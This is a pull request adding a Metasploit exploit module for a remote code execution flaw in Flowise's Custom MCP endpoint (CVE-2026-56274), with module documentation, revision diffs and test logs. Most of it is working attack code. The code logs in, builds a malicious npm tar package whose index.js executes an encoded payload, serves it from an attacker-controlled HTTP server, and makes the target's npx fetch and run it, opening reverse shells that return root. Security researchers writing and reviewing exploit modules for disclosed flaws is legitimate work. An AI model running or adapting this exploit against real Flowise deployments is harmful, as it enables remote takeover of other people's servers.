### PR TITLE
exploit/multi/http/flowise_mcp_rce: Add Flowise MCP Server RCE (CVE-2026-56274)

### DIFF
--- a/documentation/modules/exploit/multi/http/flowise_mcp_rce.md
+++ b/documentation/modules/exploit/multi/http/flowise_mcp_rce.md
@@ -1,0 +1,50 @@
+## Vulnerable Application
+
+Flowise is an open-source UI visual tool to build LLM apps. Versions prior to
+3.1.2 are vulnerable to remote code execution through the Custom MCP (Model
+Context Protocol) node configuration.
+
+A docker-compose.yml using flowiseai/flowise:3.1.1 can be used to set up the
+test environment:
+
+    docker compose up -d
+
+## Verification Steps
+
+1. Start msfconsole
+2. use exploit/multi/http/flowise_mcp_rce
+3. set RHOSTS <target>
+4. set USERNAME <email>
+5. set PASSWORD <password>
+6. set LHOST <your_ip>
+7. run check
+8. run
+
+## Options
+
+**USERNAME**
+
+The Flowise account email address used to authenticate.
+
+**PASSWORD**
+
+The Flowise account password used to authenticate.
+
+## Scenarios
+
+### Flowise 3.1.1 on Docker (Linux target)
+
+    msf exploit(multi/http/flowise_mcp_rce) > run
+
+    [*] Started reverse TCP handler on 192.168.x.x:4444
+    [*] Building malicious npm package tar in memory...
+    [+] Tar package built in memory (3584 bytes)
+    [*] Using URL: http://192.168.x.x:8000/msf.tar
+    [*] Server started.
+    [*] Authenticating as [REDACTED]...
+    [+] Authentication successful
+    [*] Sending malicious MCP node config...
+    [+] Serving malicious tar package to 192.168.x.x (GET /msf.tar)
+    [*] Command shell session 1 opened
+    / # whoami
+    root

--- a/documentation/modules/exploit/multi/http/flowise_mcp_rce.md
+++ b/documentation/modules/exploit/multi/http/flowise_mcp_rce.md
@@ -14,7 +14,8 @@ services:
   flowise-lab:
     image: flowiseai/flowise:3.1.1
     container_name: flowise-rce-v311
-    network_mode: host
+    ports:
+      - "3000:3000"
     environment:
       - FLOWISE_USERNAME=admin@example.com
       - FLOWISE_PASSWORD=Password123!

--- a/documentation/modules/exploit/multi/http/flowise_mcp_rce.md
+++ b/documentation/modules/exploit/multi/http/flowise_mcp_rce.md
@@ -4,10 +4,37 @@ Flowise is an open-source UI visual tool to build LLM apps. Versions prior to
 3.1.2 are vulnerable to remote code execution through the Custom MCP (Model
 Context Protocol) node configuration.
 
-A docker-compose.yml using flowiseai/flowise:3.1.1 can be used to set up the
+A `docker-compose.yml` using `flowiseai/flowise:3.1.1` can be used to set up the
 test environment:
 
+```yaml
+version: '3.8'
+
+services:
+  flowise-lab:
+    image: flowiseai/flowise:3.1.1
+    container_name: flowise-rce-v311
+    network_mode: host
+    environment:
+      - FLOWISE_USERNAME=admin@example.com
+      - FLOWISE_PASSWORD=Password123!
+    restart: always
+```
+
+Bring up the container:
+
     docker compose up -d
+
+After the container starts, browse to `http://<target>:3000` and complete the
+mandatory initial organization setup to create the application credentials.
+Alternatively, use the following `curl` command to initialize the application
+with the credentials used in the scenario below:
+
+```bash
+curl -X POST http://localhost:3000/api/v1/account/register \
+  -H "Content-Type: application/json" \
+  -d '{"user":{"name":"Admin","email":"admin@example.com","credential":"Password123!"}}'
+```
 
 ## Verification Steps
 
@@ -22,11 +49,11 @@ test environment:
 
 ## Options
 
-**USERNAME**
+### USERNAME
 
 The Flowise account email address used to authenticate.
 
-**PASSWORD**
+### PASSWORD
 
 The Flowise account password used to authenticate.
 
@@ -34,17 +61,34 @@ The Flowise account password used to authenticate.
 
 ### Flowise 3.1.1 on Docker (Linux target)
 
-    msf exploit(multi/http/flowise_mcp_rce) > run
+    msf6 > use exploit/multi/http/flowise_mcp_rce
+    [*] No payload configured, defaulting to cmd/unix/reverse_bash
+    msf6 exploit(multi/http/flowise_mcp_rce) > set RHOSTS 192.0.2.1
+    RHOSTS => 192.0.2.1
+    msf6 exploit(multi/http/flowise_mcp_rce) > set RPORT 3000
+    RPORT => 3000
+    msf6 exploit(multi/http/flowise_mcp_rce) > set USERNAME admin@example.com
+    USERNAME => admin@example.com
+    msf6 exploit(multi/http/flowise_mcp_rce) > set PASSWORD Password123!
+    PASSWORD => Password123!
+    msf6 exploit(multi/http/flowise_mcp_rce) > set LHOST 192.0.2.2
+    LHOST => 192.0.2.2
+    msf6 exploit(multi/http/flowise_mcp_rce) > set PAYLOAD cmd/unix/reverse_python
+    PAYLOAD => cmd/unix/reverse_python
+    msf6 exploit(multi/http/flowise_mcp_rce) > check
+    [+] 192.0.2.1:3000 - The target appears to be vulnerable. Flowise 3.1.1 detected
+    msf6 exploit(multi/http/flowise_mcp_rce) > run
 
-    [*] Started reverse TCP handler on 192.168.x.x:4444
+    [*] Started reverse TCP handler on 192.0.2.2:4444
     [*] Building malicious npm package tar in memory...
     [+] Tar package built in memory (3584 bytes)
-    [*] Using URL: http://192.168.x.x:8000/msf.tar
+    [*] Using URL: http://192.0.2.2:8080/random_uri
     [*] Server started.
-    [*] Authenticating as [REDACTED]...
+    [*] Authenticating as admin@example.com...
     [+] Authentication successful
     [*] Sending malicious MCP node config...
-    [+] Serving malicious tar package to 192.168.x.x (GET /msf.tar)
-    [*] Command shell session 1 opened
+    [+] Serving malicious tar package to 192.0.2.1 (GET /random_uri)
+    [*] Command shell session 1 opened (192.0.2.2:4444 -> 192.0.2.1:49926) at 2026-06-29 00:17:12 +0000
     / # whoami
     root
+

--- a/modules/exploits/multi/http/flowise_mcp_rce.rb
+++ b/modules/exploits/multi/http/flowise_mcp_rce.rb
@@ -1,0 +1,295 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'rubygems/package'
+require 'stringio'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::HttpServer
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Flowise MCP Server Remote Code Execution',
+        'Description' => %q{
+          Flowise versions prior to 3.1.2 are vulnerable to remote code execution
+          through the Custom MCP (Model Context Protocol) node configuration.
+
+          The vulnerability exists in the /api/v1/node-load-method/customMCP endpoint,
+          which accepts arbitrary command and argument configurations for MCP server
+          initialization. An authenticated attacker can abuse the npx --yes flag to
+          fetch and execute a malicious npm package from an attacker-controlled HTTP
+          server, achieving arbitrary command execution on the Flowise host.
+
+          This module creates a malicious npm package tar archive in memory, serves it
+          via Metasploit's built-in HTTP server, then triggers the vulnerable endpoint
+          to download and execute the package via npx.
+
+          To interact with the obtained shell, use the command: sessions -i <id>
+          (for example: sessions -i 1).
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'cn-panda', # Vulnerability discovery
+          'ABDUL JAFAROV <https://github.com/jafarov007>' # Metasploit module
+        ],
+        'References' => [
+          ['CVE', '2026-56274'],
+          ['CWE', '78'],
+          ['GHSA', 'GHSA-m99r-2hxc-cp3q'],
+          ['URL', 'https://console.vulncheck.com/cve/CVE-2026-56274']
+        ],
+        'DisclosureDate' => '2026-06-23',
+        'Platform' => ['unix', 'linux'],
+        'Arch' => [ARCH_CMD],
+        'Targets' => [
+          ['Unix Command', { 'Platform' => 'unix', 'Arch' => ARCH_CMD }]
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'PAYLOAD' => 'cmd/unix/reverse_bash',
+          'LPORT'   => 4444,
+          'SRVPORT' => 8000,
+          'URIPATH' => '/msf.tar',
+          'SSL'     => false,
+          'WfsDelay' => 30
+        },
+        'Privileged' => false,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]
+        }
+      )
+    )
+
+    register_options([
+      OptString.new('TARGETURI', [true, 'Flowise base path', '/']),
+      OptString.new('USERNAME', [true, 'Flowise username (email)']),
+      OptString.new('PASSWORD', [true, 'Flowise password'])
+    ])
+  end
+
+  def check
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'api', 'v1', 'version')
+    })
+
+    return Exploit::CheckCode::Unknown('Connection failed') unless res
+
+    if res.code == 200
+      begin
+        version = res.get_json_document['version']
+        if version && Rex::Version.new(version) < Rex::Version.new('3.1.2')
+          return Exploit::CheckCode::Vulnerable("Flowise #{version} detected")
+        end
+      rescue StandardError
+        # version parse edilemedi, devam et
+      end
+    end
+
+    Exploit::CheckCode::Safe('Not a Flowise instance or already patched')
+  end
+
+  # Build the malicious npm package tar archive entirely in memory.
+  # npm/npx expects tar entries under a "package/" prefix directory.
+  def create_tar_package
+    print_status('Building malicious npm package tar in memory...')
+
+    index_js = <<~JS
+      #!/usr/bin/env node
+      const { execSync } = require('child_process');
+      try { execSync(Buffer.from('#{Rex::Text.encode_base64(payload.encoded)}','base64').toString(), { stdio: 'inherit' }); } catch (e) {}
+    JS
+
+    package_json = {
+      'name' => 'attacker-mcp-pkg',
+      'version' => '1.0.0',
+      'bin' => {
+        'attacker-mcp-pkg' => './index.js'
+      }
+    }.to_json
+
+    tar_io = StringIO.new(''.b)
+
+    Gem::Package::TarWriter.new(tar_io) do |tar|
+      tar.add_file_simple("package/package.json", 0644, package_json.bytesize) do |f|
+        f.write(package_json)
+      end
+
+      tar.add_file_simple("package/index.js", 0755, index_js.bytesize) do |f|
+        f.write(index_js)
+      end
+    end
+
+    tar_io.rewind
+    data = tar_io.string
+
+    print_good("Tar package built in memory (#{data.bytesize} bytes)")
+    data
+  end
+
+  # HttpServer callback — serves the tar package to npx.
+  # Only receives requests matching URIPATH (/msf.tar).
+  def on_request_uri(cli, request)
+    print_good("Serving malicious tar package to #{cli.peerhost} (#{request.method} #{request.uri})")
+    send_response(cli, @tar_data, {
+      'Content-Type' => 'application/x-tar',
+      'Content-Disposition' => 'attachment; filename=msf.tar'
+    })
+  end
+
+  # Called automatically by HttpServer once the server is ready.
+  # This is where we perform the client-side attack.
+  def primer
+    cookie = do_login
+    send_exploit_payload(cookie)
+  end
+
+  def do_login
+    print_status("Authenticating as #{datastore['USERNAME']}...")
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'api', 'v1', 'auth', 'login'),
+      'ctype' => 'application/json',
+      'data' => {
+        'email' => datastore['USERNAME'],
+        'password' => datastore['PASSWORD']
+      }.to_json
+    })
+
+    unless res && res.code == 200
+      fail_with(Failure::NoAccess, "Login failed (HTTP #{res&.code || 'no response'})")
+    end
+
+    cookies = res.get_cookies
+    token_match = cookies.match(/token=([^;]+)/)
+    refresh_match = cookies.match(/refreshToken=([^;]+)/)
+    sid_match = cookies.match(/connect\.sid=([^;]+)/)
+
+    unless token_match
+      fail_with(Failure::NoAccess, 'No auth token received in login response')
+    end
+
+    cookie_parts = []
+    cookie_parts << "token=#{token_match[1]}" if token_match
+    cookie_parts << "refreshToken=#{refresh_match[1]}" if refresh_match
+    cookie_parts << "connect.sid=#{sid_match[1]}" if sid_match
+    cookie_string = cookie_parts.join('; ')
+
+    print_good('Authentication successful')
+    cookie_string
+  end
+
+  def send_exploit_payload(cookie)
+    tar_url = get_uri
+
+    print_status("Sending malicious MCP node config (tar URL: #{tar_url})...")
+
+    mcp_server_config = {
+      'command' => 'npx',
+      'args' => ['--yes', tar_url]
+    }
+
+    node_data = {
+      'loadMethods' => {},
+      'label' => 'Custom MCP',
+      'name' => 'customMCP',
+      'version' => 1.1,
+      'type' => 'Custom MCP Tool',
+      'icon' => '/usr/local/lib/node_modules/flowise/node_modules/flowise-components/dist/nodes/tools/MCP/CustomMCP/customMCP.png',
+      'category' => 'Tools (MCP)',
+      'description' => 'Custom MCP Config',
+      'inputs' => {
+        'mcpServerConfig' => mcp_server_config.to_json,
+        'mcpActions' => ''
+      },
+      'baseClasses' => ['Tool'],
+      'filePath' => '/usr/local/lib/node_modules/flowise/node_modules/flowise-components/dist/nodes/tools/MCP/CustomMCP/CustomMCP.js',
+      'inputAnchors' => [],
+      'inputParams' => [
+        {
+          'label' => 'MCP Server Config',
+          'name' => 'mcpServerConfig',
+          'type' => 'code',
+          'hideCodeExecute' => true,
+          'hint' => {
+            'label' => 'How to use',
+            'value' => "\nYou can use variables in the MCP Server Config with double curly braces `{{ }}` and prefix `$vars.<variableName>`."
+          },
+          'placeholder' => "{\n    \"command\": \"npx\",\n    \"args\": [\"-y\", \"@modelcontextprotocol/server-filesystem\", \"/path/to/allowed/files\"]\n}",
+          'id' => 'customMCP_0-input-mcpServerConfig-code',
+          'display' => true
+        },
+        {
+          'label' => 'Available Actions',
+          'name' => 'mcpActions',
+          'type' => 'asyncMultiOptions',
+          'loadMethod' => 'listActions',
+          'refresh' => true,
+          'id' => 'customMCP_0-input-mcpActions-asyncMultiOptions',
+          'display' => true
+        }
+      ],
+      'outputs' => {},
+      'outputAnchors' => [
+        {
+          'id' => 'customMCP_0-output-customMCP-Tool',
+          'name' => 'customMCP',
+          'label' => 'Custom MCP Tool',
+          'description' => 'Custom MCP Config',
+          'type' => 'Tool'
+        }
+      ],
+      'id' => 'customMCP_0',
+      'selected' => true,
+      'loadMethod' => 'listActions',
+      'previousNodes' => [],
+      'currentNode' => {
+        'id' => 'customMCP_0',
+        'name' => 'customMCP',
+        'label' => 'Custom MCP',
+        'inputs' => {
+          'mcpServerConfig' => mcp_server_config.to_json,
+          'mcpActions' => ''
+        }
+      }
+    }
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'api', 'v1', 'node-load-method', 'customMCP'),
+      'ctype' => 'application/json',
+      'headers' => {
+        'x-request-from' => 'internal',
+        'Cookie' => cookie
+      },
+      'data' => node_data.to_json
+    })
+
+    if res && res.code == 200
+      print_good("Exploit payload delivered successfully (HTTP #{res.code})")
+      print_status('Waiting for npx to fetch tar and execute payload...')
+    else
+      print_warning("Exploit request returned HTTP #{res&.code || 'no response'}")
+    end
+  end
+
+  def exploit
+    # Build the tar package in memory (needs payload to be generated first)
+    @tar_data = create_tar_package
+
+    # Start the HttpServer (serves tar) and trigger primer (sends exploit).
+    # HttpServer#exploit (super) starts the server, calls primer(), then waits
+    # for the handler to receive a session.
+    super
+  end
+end

--- a/modules/exploits/multi/http/flowise_mcp_rce.rb
+++ b/modules/exploits/multi/http/flowise_mcp_rce.rb
@@ -45,8 +45,6 @@ class MetasploitModule < Msf::Exploit::Remote
           ['URL', 'https://console.vulncheck.com/cve/CVE-2026-56274']
         ],
         'DisclosureDate' => '2026-06-23',
-        'Platform' => ['unix', 'linux'],
-        'Arch' => [ARCH_CMD],
         'Targets' => [
           ['Unix Command', { 'Platform' => 'unix', 'Arch' => ARCH_CMD }]
         ],
@@ -164,9 +162,9 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     cookies = res.get_cookies
-    token_match = cookies.match(/token=([^;]+)/)
-    refresh_match = cookies.match(/refreshToken=([^;]+)/)
-    sid_match = cookies.match(/connect\.sid=([^;]+)/)
+    token_match = cookies.match(/(?:^|;\s*)token=([^;]+)/)
+    refresh_match = cookies.match(/(?:^|;\s*)refreshToken=([^;]+)/)
+    sid_match = cookies.match(/(?:^|;\s*)connect\.sid=([^;]+)/)
 
     unless token_match
       fail_with(Failure::NoAccess, 'No auth token received in login response')

--- a/modules/exploits/multi/http/flowise_mcp_rce.rb
+++ b/modules/exploits/multi/http/flowise_mcp_rce.rb
@@ -19,7 +19,7 @@ class MetasploitModule < Msf::Exploit::Remote
         info,
         'Name' => 'Flowise MCP Server Remote Code Execution',
         'Description' => %q{
-          Flowise versions prior to 3.1.2 are vulnerable to remote code execution
+          Flowise versions from 2.2.7 prior to 3.1.2 are vulnerable to remote code execution
           through the Custom MCP (Model Context Protocol) node configuration.
 
           The vulnerability exists in the /api/v1/node-load-method/customMCP endpoint,
@@ -72,6 +72,10 @@ class MetasploitModule < Msf::Exploit::Remote
     return Exploit::CheckCode::Unknown('Unable to determine Flowise version') unless version
 
     report_service(host: rhost, port: rport, name: 'http', proto: 'tcp', info: "Flowise #{version}")
+
+    if version < Rex::Version.new('2.2.7')
+      return Exploit::CheckCode::Safe("Flowise #{version} does not feature customMCP support")
+    end
 
     if version < Rex::Version.new('3.1.2')
       return Exploit::CheckCode::Appears("Flowise #{version} detected")

--- a/modules/exploits/multi/http/flowise_mcp_rce.rb
+++ b/modules/exploits/multi/http/flowise_mcp_rce.rb
@@ -1,10 +1,9 @@
+# frozen_string_literal: true
+
 ##
 # This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
-
-require 'rubygems/package'
-require 'stringio'
 
 class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
@@ -52,14 +51,6 @@ class MetasploitModule < Msf::Exploit::Remote
           ['Unix Command', { 'Platform' => 'unix', 'Arch' => ARCH_CMD }]
         ],
         'DefaultTarget' => 0,
-        'DefaultOptions' => {
-          'PAYLOAD' => 'cmd/unix/reverse_bash',
-          'LPORT'   => 4444,
-          'SRVPORT' => 8000,
-          'URIPATH' => '/msf.tar',
-          'SSL'     => false,
-          'WfsDelay' => 30
-        },
         'Privileged' => false,
         'Notes' => {
           'Stability' => [CRASH_SAFE],
@@ -88,10 +79,10 @@ class MetasploitModule < Msf::Exploit::Remote
       begin
         version = res.get_json_document['version']
         if version && Rex::Version.new(version) < Rex::Version.new('3.1.2')
-          return Exploit::CheckCode::Vulnerable("Flowise #{version} detected")
+          return Exploit::CheckCode::Appears("Flowise #{version} detected")
         end
       rescue StandardError
-        # version parse edilemedi, devam et
+        # Failed to parse version, continue
       end
     end
 
@@ -117,27 +108,28 @@ class MetasploitModule < Msf::Exploit::Remote
       }
     }.to_json
 
-    tar_io = StringIO.new(''.b)
+    tar_io = StringIO.new
 
-    Gem::Package::TarWriter.new(tar_io) do |tar|
-      tar.add_file_simple("package/package.json", 0644, package_json.bytesize) do |f|
+    Rex::Tar::Writer.new(tar_io) do |tar|
+      tar.add_file('package/package.json', 0o644) do |f|
         f.write(package_json)
       end
 
-      tar.add_file_simple("package/index.js", 0755, index_js.bytesize) do |f|
+      tar.add_file('package/index.js', 0o755) do |f|
         f.write(index_js)
       end
     end
 
-    tar_io.rewind
-    data = tar_io.string
+    tar_io.seek(0)
+    data = tar_io.read
+    tar_io.close
 
     print_good("Tar package built in memory (#{data.bytesize} bytes)")
     data
   end
 
-  # HttpServer callback — serves the tar package to npx.
-  # Only receives requests matching URIPATH (/msf.tar).
+  # HttpServer callback -- serves the tar package to npx.
+  # Receives requests matching the auto-generated URIPATH.
   def on_request_uri(cli, request)
     print_good("Serving malicious tar package to #{cli.peerhost} (#{request.method} #{request.uri})")
     send_response(cli, @tar_data, {
@@ -149,6 +141,7 @@ class MetasploitModule < Msf::Exploit::Remote
   # Called automatically by HttpServer once the server is ready.
   # This is where we perform the client-side attack.
   def primer
+    @tar_data = create_tar_package
     cookie = do_login
     send_exploit_payload(cookie)
   end
@@ -281,15 +274,5 @@ class MetasploitModule < Msf::Exploit::Remote
     else
       print_warning("Exploit request returned HTTP #{res&.code || 'no response'}")
     end
-  end
-
-  def exploit
-    # Build the tar package in memory (needs payload to be generated first)
-    @tar_data = create_tar_package
-
-    # Start the HttpServer (serves tar) and trigger primer (sends exploit).
-    # HttpServer#exploit (super) starts the server, calls primer(), then waits
-    # for the handler to receive a session.
-    super
   end
 end

--- a/modules/exploits/multi/http/flowise_mcp_rce.rb
+++ b/modules/exploits/multi/http/flowise_mcp_rce.rb
@@ -10,6 +10,8 @@ class MetasploitModule < Msf::Exploit::Remote
 
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::Remote::HttpServer
+  include Msf::Exploit::Remote::HTTP::Flowise
+  prepend Msf::Exploit::Remote::AutoCheck
 
   def initialize(info = {})
     super(
@@ -59,31 +61,23 @@ class MetasploitModule < Msf::Exploit::Remote
 
     register_options([
       OptString.new('TARGETURI', [true, 'Flowise base path', '/']),
-      OptString.new('USERNAME', [true, 'Flowise username (email)']),
-      OptString.new('PASSWORD', [true, 'Flowise password'])
+      OptString.new('USERNAME', [false, 'Flowise username (email)']),
+      OptString.new('PASSWORD', [false, 'Flowise password']),
+      Opt::RPORT(3000)
     ])
   end
 
   def check
-    res = send_request_cgi({
-      'method' => 'GET',
-      'uri' => normalize_uri(target_uri.path, 'api', 'v1', 'version')
-    })
+    version = flowise_get_version
+    return Exploit::CheckCode::Unknown('Unable to determine Flowise version') unless version
 
-    return Exploit::CheckCode::Unknown('Connection failed') unless res
+    report_service(host: rhost, port: rport, name: 'http', proto: 'tcp', info: "Flowise #{version}")
 
-    if res.code == 200
-      begin
-        version = res.get_json_document['version']
-        if version && Rex::Version.new(version) < Rex::Version.new('3.1.2')
-          return Exploit::CheckCode::Appears("Flowise #{version} detected")
-        end
-      rescue StandardError
-        # Failed to parse version, continue
-      end
+    if version < Rex::Version.new('3.1.2')
+      return Exploit::CheckCode::Appears("Flowise #{version} detected")
     end
 
-    Exploit::CheckCode::Safe('Not a Flowise instance or already patched')
+    Exploit::CheckCode::Safe("Target is running patched version #{version}")
   end
 
   # Build the malicious npm package tar archive entirely in memory.
@@ -135,52 +129,31 @@ class MetasploitModule < Msf::Exploit::Remote
     })
   end
 
+  # Ensure randomly generated URIPATH contains only lower-case characters for npx compatibility
+  def random_uri
+    '/' + Rex::Text.rand_text_alpha_lower(rand(6..15))
+  end
+
   # Called automatically by HttpServer once the server is ready.
   # This is where we perform the client-side attack.
   def primer
     @tar_data = create_tar_package
-    cookie = do_login
-    send_exploit_payload(cookie)
-  end
 
-  def do_login
-    print_status("Authenticating as #{datastore['USERNAME']}...")
-
-    res = send_request_cgi({
-      'method' => 'POST',
-      'uri' => normalize_uri(target_uri.path, 'api', 'v1', 'auth', 'login'),
-      'ctype' => 'application/json',
-      'data' => {
-        'email' => datastore['USERNAME'],
-        'password' => datastore['PASSWORD']
-      }.to_json
-    })
-
-    unless res && res.code == 200
-      fail_with(Failure::NoAccess, "Login failed (HTTP #{res&.code || 'no response'})")
+    if get_resource != get_resource.downcase
+      hardcoded_uripath(get_resource.downcase)
     end
 
-    cookies = res.get_cookies
-    token_match = cookies.match(/(?:^|;\s*)token=([^;]+)/)
-    refresh_match = cookies.match(/(?:^|;\s*)refreshToken=([^;]+)/)
-    sid_match = cookies.match(/(?:^|;\s*)connect\.sid=([^;]+)/)
-
-    unless token_match
-      fail_with(Failure::NoAccess, 'No auth token received in login response')
+    if flowise_requires_auth?
+      print_status("Authenticating as #{datastore['USERNAME']}...")
+      flowise_login(datastore['USERNAME'], datastore['PASSWORD'])
     end
 
-    cookie_parts = []
-    cookie_parts << "token=#{token_match[1]}" if token_match
-    cookie_parts << "refreshToken=#{refresh_match[1]}" if refresh_match
-    cookie_parts << "connect.sid=#{sid_match[1]}" if sid_match
-    cookie_string = cookie_parts.join('; ')
-
-    print_good('Authentication successful')
-    cookie_string
+    report_service(host: rhost, port: rport, name: 'http', proto: 'tcp')
+    send_exploit_payload
   end
 
-  def send_exploit_payload(cookie)
-    tar_url = get_uri
+  def send_exploit_payload
+    tar_url = get_uri.downcase
 
     print_status("Sending malicious MCP node config (tar URL: #{tar_url})...")
 
@@ -254,22 +227,12 @@ class MetasploitModule < Msf::Exploit::Remote
       }
     }
 
-    res = send_request_cgi({
-      'method' => 'POST',
-      'uri' => normalize_uri(target_uri.path, 'api', 'v1', 'node-load-method', 'customMCP'),
-      'ctype' => 'application/json',
-      'headers' => {
-        'x-request-from' => 'internal',
-        'Cookie' => cookie
-      },
-      'data' => node_data.to_json
-    })
-
-    if res && res.code == 200
-      print_good("Exploit payload delivered successfully (HTTP #{res.code})")
+    res = flowise_send_custommcp_request(node_data)
+    if res
+      print_good('Exploit payload delivered successfully')
       print_status('Waiting for npx to fetch tar and execute payload...')
     else
-      print_warning("Exploit request returned HTTP #{res&.code || 'no response'}")
+      print_warning('Exploit request failed')
     end
   end
 end

--- a/modules/exploits/multi/http/flowise_mcp_rce.rb
+++ b/modules/exploits/multi/http/flowise_mcp_rce.rb
@@ -41,8 +41,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'References' => [
           ['CVE', '2026-56274'],
           ['CWE', '78'],
-          ['GHSA', 'GHSA-m99r-2hxc-cp3q'],
-          ['URL', 'https://console.vulncheck.com/cve/CVE-2026-56274']
+          ['GHSA', 'GHSA-m99r-2hxc-cp3q']
         ],
         'DisclosureDate' => '2026-06-23',
         'Targets' => [


### PR DESCRIPTION
## Description

Adds a new exploit module for CVE-2026-56274, a remote code execution
vulnerability in Flowise versions prior to 3.1.2.

The vulnerability exists in the /api/v1/node-load-method/customMCP endpoint,
which allows an authenticated attacker to execute arbitrary commands via a
malicious npm package served over HTTP and executed by npx.

**Related Issue:** N/A

## Breaking Changes

None

## Verification Steps

1. - [x] Start a vulnerable Flowise instance (version < 3.1.2)
2. - [x] Load the module: `use exploit/multi/http/flowise_mcp_rce`
3. - [x] Set RHOSTS, USERNAME, PASSWORD, LHOST
4. - [x] Run `check` to verify the target is vulnerable
5. - [x] Run `exploit` to obtain a command shell session — expected output: `whoami` returns `root`

## Test Evidence

msf exploit(multi/http/flowise_mcp_rce) > set PAYLOAD cmd/unix/reverse_python
PAYLOAD => cmd/unix/reverse_python
msf exploit(multi/http/flowise_mcp_rce) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf exploit(multi/http/flowise_mcp_rce) > 
[*] Started reverse TCP handler on 192.168.x.x:4444 
[*] Building malicious npm package tar in memory...
[+] Tar package built in memory (3584 bytes)
[*] Using URL: http://192.168.x.x:8000/msf.tar
[*] Server started.
[*] Authenticating as asdf@asf.asdf...
[+] Authentication successful
[*] Sending malicious MCP node config (tar URL: http://192.168.x.x:8000/msf.tar)...
[+] 192.168.x.x   flowise_mcp_rce - Serving malicious tar package to 192.168.x.x (GET /msf.tar)
[*] Command shell session 1 opened (192.168.x.x:4444 -> 192.168.x.x:49926) at 2026-06-29 00:17:12 +0300
[!] Exploit request returned HTTP no response
sessions -i 1
[*] Starting interaction with 1...


Shell Banner:
/bin/sh: can't access tty; job control turned off
/ #
-----
          
/ # ls
a.out
bin
dev
etc
home
lib
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var
??H?B?????
/ # whoami
root


## Environment

| Field | Details |
|-------|---------|
| **Operating System** | Kali Linux |
| **Target Software/Hardware** | Flowise 3.1.1 |

## AI Usage Disclosure

None

## Pre-Submission Checklist

- [x] Included a corresponding documentation markdown file in `documentation/modules`
- [x] No sensitive information (IP addresses, credentials, API keys, hashes) in code or documentation
- [x] Tested on the target environment specified in the Environment section above
- [x] Read the CONTRIBUTING.md and module acceptance guidelines
- [ ] Included RSpec tests for library changes
